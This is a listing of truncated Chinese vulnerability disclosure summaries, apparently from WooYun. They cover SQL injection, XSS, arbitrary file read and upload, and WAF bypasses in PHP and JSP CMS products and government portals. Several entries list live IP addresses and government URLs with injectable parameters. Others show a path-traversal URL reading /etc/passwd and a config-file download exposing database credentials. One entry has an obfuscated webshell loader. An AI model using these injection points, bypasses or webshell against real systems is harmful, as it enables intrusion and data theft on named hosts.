PHPB2B某处sql注入#5

简要描述： PHPB2B某处sql注入5 详细说明： 官网下载的最新版本 PHPB2B某处sql注入 virtual-office/favor.php 25-45行 ifisset$POST'do' && isset$POST'id' //check limit $typeid = 1; $flimit = $pdb-GetOne$sql = "SELECT countid FROM $tbprefixfavorites WHERE typeid='".$typeid."' AND memberid=".$thememberid; if...

Evecom /admin/content/upload.jsp 文件上传漏洞

No description provided by source...

实战绕过云锁1.3.145进行XSS测试

简要描述： 这次出现在XSS防护上遗漏 详细说明： 正常的脚本alert1云锁可以有效防护，如下： 漏洞证明： 通过使用下面这个脚本： 成功绕过并弹cookie...

PHPB2B某处sql注入#4

简要描述： PHPB2B某处sql注入4 详细说明： PHPB2B某处sql注入 官网下载的最新版本 virtual-office/news.php 73-80行 if isset$POST'del' $result = $companynews-del$POST'newsid', $conditions; if $result flash"success"; else flash"actionfailed"; post的数据传入del函数，跟入看看。 function del$ids, $conditions = null, $table = null $delid =...

PHP云人才系统(20141229)2处SQL注入

简要描述： PHP云人才系统20141229二处隐蔽的SQL注入 详细说明： PHP云人才系统二处SQL注入。 0x01: 问答首页 ======================== URL为： http://www.hr135.com/ask/index.php?order=addtime 其中参数order可以注入。 看看代码/include/libs/SmartyCompiler.class.php：5330 5330 function complieqliststart$tagargs 5331 5332 $paramer = $this-parseattrs$tagargs;...

LotusCMS v3.0 /core/lib/router.php 代码执行漏洞

No description provided by source...

PHPMyWind v5.0 /product.php SQL注入漏洞

No description provided by source...

PHPMyWind 5.2 /admin/infoimg_do.php SQL注入漏洞

No description provided by source...

某政府系统一处越权+一处SQL注入

简要描述： RT 详细说明： 山东农友软件公司官网:http://www.nongyou.com.cn/ 越权案例如下： http://221.2.149.47:8100/jubao/left.aspx http://222.135.109.70:8100/jubao/left.aspx http://123.134.189.60:8012/jubao/left.aspx http://218.56.40.229:8020/jubao/left.aspx http://222.135.127.190:7000/jubao/left.aspx 2.一处越权注入：...

PHP云人才系统某处设计缺陷导致的SQL注入

简要描述： PHP云人才系统某处设计缺陷导致的SQL注入 最新版DEMO测试，同样适用低版本 详细说明： 在文件/data/db.safety.php:193 193 foreach$GET as $id=$v 194 195 $str = htmlentitydecode$v,ENTQUOTES,"GB2312"; 196 197 $v = commonhtmlspecialchars$id,$v,$str,$config; 198 safesql$id,$v,"GET",$config; 199 $id = sfkeyword$id,$config; 200 $v =...

用友NC-IUFO系统通用SQL注入

简要描述： rt 详细说明： 有人提交了，就顺手来看看 漏洞文件：core/public/singleplandetail.jsp 漏洞参数：pk=1012F41000000000WA2V 漏洞类型：SQL注入漏洞（GET型） 影响用户： 收集几个案例，方便测试 http://nc.xhlbdc.com/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V...

Coremail某功能多处存储型XSS

简要描述： 漏洞还是得交乌云。 详细说明： coremail在个人通讯录处可以导入联系人，格式为csv。 导入如下CSV： 联系组,姓名,电子邮件地址,住宅地址,住宅地址 邮政编码,住宅电话,移动电话,单位,商务地址,商务地址 邮政编码,商务电话,商务传真,生日,即时信息地址,网页,cmgroup aaaaaaa,,@qq.com,,,,13132132132,,,,,,19881212,,javascript:alert1 ,,,,,,,,,,,,,,,FRIENDS= ,,,,,,,,,,,,,,,FAMILY= ,,,,,,,,,,,,,,,COWORKERS=...

某大型政府服务系统Oracle注入(使用量大)

简要描述： rt，霍霍。为了生活费也是蛮拼的。。。。 详细说明： 问题厂商:深圳太极软件有限公司 一套专门的政务服务系统 用户量：大 影响：广 注入点 browsebgxz.do?method=dept&deptid=（deptid存注入） google关键字：inurl:browsebgxz.do?method= 案例: http://www.gygxzw.gov.cn:8066/browsebgxz.do?method=dept&deptid=556631684 http://61.189.156.73/browsebgxz.do?method=dept&deptid=0094204...

云锁最新版1.3.145绕过webshell检测

简要描述： webshell检测绕过 详细说明： 一句话马+大马绕过检测 漏洞证明： 1.一句话木马，单纯用这种方式肯定会被检测到，我们采用这种方式： 结果发现只有一开始说的那种文件被检测到： 2.大马，采用base64+gzinflate压缩编码，大马文件如下： ?php function CLsI$ZzvSWE $ZzvSWE=gzinflatebase64decode$ZzvSWE; for$i=0;$istrlen$ZzvSWE;$i++ $ZzvSWE$i = chrord$ZzvSWE$i-1; return $ZzvSWE;...

云锁最新版1.3.145另外一种方式可Bypass

简要描述： 某大牛脚步 摩擦 详细说明： \x00的使用可绕过SQL防注入 漏洞证明： 首先看以下两组图片： 1.有告警： 2.\x00无告警：...

某政府系统两处注入打包

简要描述： RT 详细说明： 山东农友软件公司官网:http://www.nongyou.com.cn/ 所有参数:tname和 CountryName都存在注入的。 案例如下： http://218.56.99.84:8003/newSymSum/VillagePersonal2.aspx?tname=太河镇&CountryName=东同古村 http://222.135.109.70:8200/newSymSum/VillagePersonal2.aspx?tname=泽库镇&CountryName=辛立庄村...

大汉jcms多处SQL注入二(附80个案例)

简要描述： 一类很明显，但目前不容易发现的漏洞 详细说明： webservice 漏洞，目前非常多的系统均有该service 恰巧的是，该service的漏洞，是不被人注意的，因而 教容易产生漏洞 /jcms/services/WSReceive?wsdl 下图的多个方法，方法中的多个参数均存在注入 随便选取一个方法进行测试 /jcms/services/WSReceive?wsdl wsGetColumn方法 用WSockExpert v0.7抓包，并保存为wooyun.txt POST /jcms/services/WSReceive?wsdl HTTP/1.1...

XYCMS建站系统SQL注入#3

简要描述： XYCMS建站系统SQL注入3 详细说明： 同前两个不同 XYCMS建站系统SQL注入1 XYCMS建站系统SQL注入2 前两个是v1.9系统。 版本是v2.5 这里提交的是：xycms-utf8-2.5 这里提交的在wooyun没有提交过！这里提交的点与之前的不重复，证明： casedetail.asp未对id进行任何过滤就直接带入数据库查询 id=request.QueryString"id" set rs=server.createobject"adodb.recordset" exec="select from xycase where id="& id rs.ope...

大汉网络JCMS任意文件下载

简要描述： 大汉网络文件遍历 详细说明： 漏洞Url： /jcms/m5e/module/voting/down.jsp?filename=a.txt&pathfile=/etc/passwd 下载文件： root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin...

HDWIKI鸡肋SQL注入（PHP弱类型实例）

简要描述： 见drops中@小飞发了一篇文章：http://drops.wooyun.org/tips/4483 我一直认为没有实例的文章不是好文章，于是来帮他加个实例，由PHP弱类型造成的SQL注入，非常典型。 为了不拉低大号的平均rank，小号交起嘿 详细说明： /control/list.php 109行 function dofocus $doctype = $this-get2; switch$doctype case 2: $type = 'hot'; $navtitle = $this-view-lang'hotDoc'; break; case 3: $type =...

骑士人才系统越权修改简历(demo演示)

简要描述： 权限控制不严格 详细说明： wap/pwersonal/wapuser.php中 判断是否登录的代码如下 if intval$SESSION'uid'=='' || $SESSION'username'==''||intval$SESSION'utype'==1 header"Location: ../waplogin.php"; //如未登录则跳转,若登录则elseif语句 elseif $act == 'index' $smarty-cache = false; $user=wapgetuserinfointval$SESSION'uid';...

U-Mail v9.8.57 /getpass.php 信息泄漏漏洞

No description provided by source...

phpyun v3.2 二次注入一枚(绕过过滤,无需登录)

简要描述： 20141226的对之前的绕过过滤的那里也稍微改了下。。 这个改了 依旧能直接绕过 无限制。 可以直接出管理的密码啥的。 本地直接出管理密码了,demo测试。。 因为demo有安全狗。不会搞安全狗。 就直接延个时了。。 详细说明： http://www.hr135.com/company/index.php?m=index&c=index&id=3751&style=../../template/admin&tp=/adminwebconfig 可以发现现在打开是空白了。。 来看看代码。 在conpany/model/index.class.php中 $GET'style' ...

XYCMS建站系统SQL注入#2

简要描述： XYCMS建站系统SQL注入2 详细说明： 同第一个 XYCMS建站系统SQL注入1 这里提交的在wooyun没有提交过！这里提交不重复，证明： 除了：fwxmdetail.asp，news.asp，teamdetail.asp这些外。。。 jobdetail.asp未对id进行任何过滤就直接带入数据库查询 id=request.QueryString"id" set rs=server.createobject"adodb.recordset" exec="select from zpxx where id="& id rs.open exec,conn,1,1 if...

PHPAPP注入第十三枚（无视过滤）

简要描述： PHPAPP注入第十三枚（无视过滤） 详细说明： 在wooyun上看到了有人提了PHPAPP的漏洞： http://wooyun.org/bugs/wooyun-2010-055604，然后去官网看了看，前几天刚有更新，就在官网下了PHPAPP最新的v2.6来看看2014-12-11更新的。 PSOT注入点：wwww.xxx.com/member.php?action=1&app=42&cid=85&rid=973, 存在漏洞的文件在/phpapp/apps/rights/memberphpapp.php 下面分析一下漏洞产生的原因 第一处绕过：...

某政府系统一处SQL注入

简要描述： 往下看 详细说明： 山东农友软件公司官网:http://www.nongyou.com.cn/ 案例如下： http://218.58.124.131:8003/ckq/hnzcout.aspx?tname=中央商务片区&CountryName=小庄社区 http://123.134.189.60:8022/ckq/hnzcout.aspx?tname=牛泉镇&CountryName=杨小庄 http://218.56.99.84:8003/ckq/hnzcout.aspx?tname=双杨镇&CountryName=西张村...

实战绕过云锁(1.3.145)进行注入测试绕过技巧

简要描述： 这次来个实例 详细说明： @疯狗 感谢提示，参考zone http://zone.wooyun.org/content/16772 id=8E0union select ...这种方式 和id=8.0union select ... 漏洞证明： 本地搭建74cms web环境并把云锁所有防护打开。 下面注入点是把对应intval去掉后测试的 include/funwap.php function companyone$id global $db; $wheresql=" WHERE id=".$id;//这里 $sql = "select from...

从ThinkPHP谈基于框架开发程序的安全性二（有开源程序实例）

简要描述： 从ThinkPHP谈基于框架开发程序的安全性二，继续讨论基于框架开发可能带来的问题，厂商忽略不忽略都没关系，主要是给大家提出来，不管是程序员安全意识的问题，还是框架本身的设计缺陷，总之在使用这些框架开发时不要给自己挖坑了。 详细说明： 首先我们来看看官方文档： http://document.thinkphp.cn/manual32.htmlmodelinstance 这里主要介绍了模型实例化的一些方法 终点介绍了D方法和M方法的使用 D方法实例化 select; M方法实例化 // 使用M方法实例化 $User = M'User'; // 和用法 $User = new...

实战绕过云锁1.3.145进行注入测试二

简要描述： 嘿嘿 详细说明： 之前http://www.wooyun.org/bugs/wooyun-2014-089487/trace/ca338e20666fbe79e87f32643c939075 通过id=8.0union select ...和id=8E0union select ...可绕过安全狗进行注入 然后这次是/!50000SeLect/这种姿势 漏洞证明： 获取管理员的pwd为例，没有任何提示...

某政府系统一处SQL注入#2

简要描述： RT 详细说明： 山东农友软件公司官网:http://www.nongyou.com.cn/ 案例如下： http://222.135.76.147:8200/ckq/jwhkzjdlist.aspx?tname=宁津办事处&CountryName=所前王家 http://60.217.72.17:7117/ckq/jwhkzjdlist.aspx?tname=山头办&CountryName=河北西社区 http://218.58.124.131:8003/ckq/jwhkzjdlist.aspx?tname=综合保税物流片区&CountryName=北岭村...

MyBB 1.8.1 /member.php SQL注入漏洞

注册时post参数questionid存在SQL注入 http://xxx/mybb/member.php?action=register...

云锁最新版1.3.145又三种方式可Bypass

简要描述： 三处绕过防护打包 详细说明： \x00深入发现，除了post型可绕过防护，get\cookie也可以绕过，另外header里X-Forward-For注入语句完全没防护。防护规则手工配置界面： 没有header里的配置。 漏洞证明： 1.\x00的Get型绕过： 执行下面python脚本后发现成功绕过，没有防护提示： 2.根据上面原理，\x00同样可cookie绕过 3.header里无防护：...

PHPAPP注入第真十二枚（无视过滤）

简要描述： PHPAPP注入第真十二枚（无视过滤） 详细说明： 在wooyun上看到了有人提了PHPAPP的漏洞： http://wooyun.org/bugs/wooyun-2010-055604，然后去官网看了看，前几天刚有更新，就在官网下了PHPAPP最新的v2.6来看看2014-12-11更新的。 PSOT注入点：wwww.xxx.com/index.php?action=8&app=80, 存在漏洞的文件在/phpapp/apps/taskcount/mainphpapp.php 下面分析一下漏洞产生的原因 第一处绕过：...

PHPAPP注入第十一枚（无视过滤）

简要描述： PHPAPP注入第十一枚（无视过滤） 详细说明： 在wooyun上看到了有人提了PHPAPP的漏洞： http://wooyun.org/bugs/wooyun-2010-055604，然后去官网看了看，前几天刚有更新，就在官网下了PHPAPP最新的v2.6来看看2014-12-11更新的。 PSOT注入点：wwww.xxx.com/index.php?action=10&app=49, 存在漏洞的文件在/phpapp/apps/taskmode/mainphpapp.php 下面分析一下漏洞产生的原因 第一处绕过：...

PHPAPP注入第九枚（insert无视过滤）

简要描述： PHPAPP注入第九枚（insert无视过滤） 详细说明： 在wooyun上看到了有人提了PHPAPP的漏洞： http://wooyun.org/bugs/wooyun-2010-055604，然后去官网看了看，前几天刚有更新，就在官网下了PHPAPP最新的v2.6来看看2014-12-11更新的。 PSOT注入点：wwww.xxx.com/member.php?action=1&app=43&cid=2&rid=-1, 存在漏洞的文件在/phpapp/apps/refund/memberphpapp.php...

phpyun (20141230) 任意文件删除致注入可改任意用户密码(4处打包)

简要描述： 更新了 来看看。 果然是功能越多 bug越多 bug越多 rank越多。 这个不小心测试了下 demo, 把demo的robots.txt 和 图标都删除了。 你们自己再加上去下把。 phpyun基本都是靠过滤文件。 如果删除过滤文件 肯定是有注入了。 而且删除过滤文件不会像删除install的lock一样对网站造成啥损害。 详细说明： http://www.phpyun.com/bbs/thread-8149-1-1.html //20141222...

PHPok v4.1 /framework/www/project/control.php SQL注入漏洞

/framework/www/projectcontrol.php $ext = $this-get"ext"; if$ext && isarray$ext $c = ''; foreach$ext AS $key=$value if$key && $value $c = "ext.".$key." LIKE '%".$value."%'"; $pageurl .= "ext".$key."=".rawurlencode$value."&"; if$c $dt'sqlext' = implode" AND ",$c; $this-assign'ext',$ext;...

ECSHOP全版本通杀注射之2（还是小细节害死人）

简要描述： ECSHOP全版本通杀注射2 还是小细节害死人 详细说明： http://wooyun.org/bugs/wooyun-2014-086052 ECSHOP全版本通杀注射 这里的是用户名处，官方给了补丁，但是修复的仅仅是用户名处。。。。。 亲，注册还有邮箱处未修复！ 注入依旧！ 漏洞证明： http://wooyun.org/bugs/wooyun-2014-086052 ECSHOP全版本通杀注射 这里的是用户名处，官方给了补丁，但是修复的仅仅是用户名处。。。。。 亲，注册还有邮箱处未修复！ 注入依旧！POC和我上一处提交的一样！...

MyBB 1.8.2 MyBBlog 跨站脚本漏洞

No description provided by source...

PHPok 4.2.024 /framework/engine/session_file.php SQL注入漏洞

No description provided by source...

某通用型大学生管理系统非授权访问

简要描述： 1操作手册泄漏测试用户及密码 2非授权访问，可直接获取系统内所有用户关键信息 3一枚任意文件上传漏洞 详细说明： 注意与其不同 WooYun: 某通用型创新管理系统普通帐号可越权查看及修改任意用户（影响多所高等院校） 官网：http://www.changedu.com/ 由南京先极科技有限公司开发的大学生创新创业训练项目智能管理系统 关键字：大学生创新创业项目智能管理系统 影响案例： http://desktop.nju.edu.cn/cx/ 南京大学大学生创新创业训练智能管理系统 http://dxscx.forestpolice.net/...

大汉jcms某处SQL注入漏洞一枚

简要描述： RT 详细说明： 貌似通杀不少版本的 直接分析了 漏洞文件：/jcms/jcmsfiles/jcms1/web2/site/module/comment/oprgetcount.jsp 漏洞参数：fnKeywords 漏洞类型：SQL注入（GET型） 漏洞分析： 先看oprgetcount.jsp文件： ......//省掉前面无关代码 % response.setHeader"Pragma","No-cache"; response.setHeader"Cache-Control","no-cache"; response.setDateHeader"Expires", 0...

某政府信息公开系统存在SQL注入

简要描述： RT 详细说明： 吉大正元信息技术股份有限公司:http://www.jit.com.cn/ 众多政府网站都在使用该系统。 我就用5个案例来测试 注入链接： /zwdtSjgl/info/gonggaoiframe.jsp?cid= 案例： http://222.34.78.21/zwdtSjgl/info/gonggaoiframe.jsp?cid=3 http://218.27.207.22/zwdtSjgl/info/gonggaoiframe.jsp?cid=3...

PHPAPP注入第六枚（无视过滤）

简要描述： PHPAPP注入第六枚（无视过滤） 详细说明： 在wooyun上看到了有人提了PHPAPP的漏洞： http://wooyun.org/bugs/wooyun-2010-055604，然后去官网看了看，前几天刚有更新，就在官网下了PHPAPP最新的v2.6来看看2014-12-11更新的。 PSOT注入点：wwww.xxx.com/member.php?action=3&app=70&type=12 , 存在漏洞的文件在/phpapp/apps/map/memberphpapp.php 来看看漏洞是如何产生的/phpapp/apps/map/memberphpapp.php...

某大型政府系统任意文件读取及Oracle注入

简要描述： 某大型政府系统任意文件读取及Oracle注入 详细说明： 这系统有人提交过，详情： WooYun: 某大型政府服务系统Oracle注入使用量大 文件读取（获取数据库用户、密码等）： /download?url=../../WEB-INF/classes/wssp/util/dbconfig.properties http://hxasc.cn/download?url=../../WEB-INF/classes/wssp/util/dbconfig.properties...

PHPAPP注入第四枚（各种无视过滤）

简要描述： PHPAPP注入第四枚（各种无视过滤） 详细说明： 在wooyun上看到了有人提了PHPAPP的漏洞： http://wooyun.org/bugs/wooyun-2010-055604，然后去官网看了看，前几天刚有更新，就在官网下了PHPAPP最新的v2.6来看看2014-12-11更新的。 PSOT注入点：wwww.xxx.com/member.php?action=1&app=43&cid=1&rid=2, 存在漏洞的文件在/phpapp/apps/refund/memberphpapp.php 下面分析一下漏洞产生的原因 第一处绕过：...

PHPAPP注入第七枚（无视过滤）

简要描述： PHPAPP注入第七枚（无视过滤） 详细说明： 在wooyun上看到了有人提了PHPAPP的漏洞： http://wooyun.org/bugs/wooyun-2010-055604，然后去官网看了看，前几天刚有更新，就在官网下了PHPAPP最新的v2.6来看看2014-12-11更新的。 PSOT注入点：wwww.xxx.com/index.php?app=80&action=12, 存在漏洞的文件在/phpapp/apps/taskcount/mainphpapp.php 来看看漏洞是如何产生的/phpapp/apps/taskcount/mainphpapp.php...

某政府信息公开系统存在SQL注入

简要描述： RT 详细说明： 吉大正元信息技术股份有限公司:http://www.jit.com.cn/ 众多政府网站都在使用该系统 我就用5个案例来测试。 注入链接是： /zwdtSjgl/Directory/showDir.jsp?keyid= 案例： http://www.ilj.gov.cn/zwdtSjgl/Directory/showDir.jsp?keyid=PI201307051520180523 http://218.27.207.21/zwdtSjgl/Directory/showDir.jsp?keyid=PI201101131105070841...

PHPAPP注入第八枚（无视过滤）

简要描述： PHPAPP注入第八枚（无视过滤） 详细说明： 在wooyun上看到了有人提了PHPAPP的漏洞： http://wooyun.org/bugs/wooyun-2010-055604，然后去官网看了看，前几天刚有更新，就在官网下了PHPAPP最新的v2.6来看看2014-12-11更新的。 PSOT注入点：wwww.xxx.com/index.php?action=5&app=5, 存在漏洞的文件在/phpapp/apps/apppay/mainphpapp.php 来看看漏洞是如何产生的/phpapp/apps/apppay/mainphpapp.php function...

phpyun v3.2 (20141226) 两处注入。

简要描述： 最近更新日期（2014-12-26） 又更新了, 麻烦别再给5rank了 20走起可好。 一处是新的 一处算是绕过补丁了。 之前还有一两个没打补丁哦 加快速度把。 详细说明： 第一处 新发现的在兑换奖品的时候 在model/redeem.class.php中 function dhaction $this-publicaction; if!$this-uid && !$this-username $this-obj-ACTlayermsg"您还没有登录，请先登录！",8,$SERVER'HTTPREFERER'; if$POST'submit'...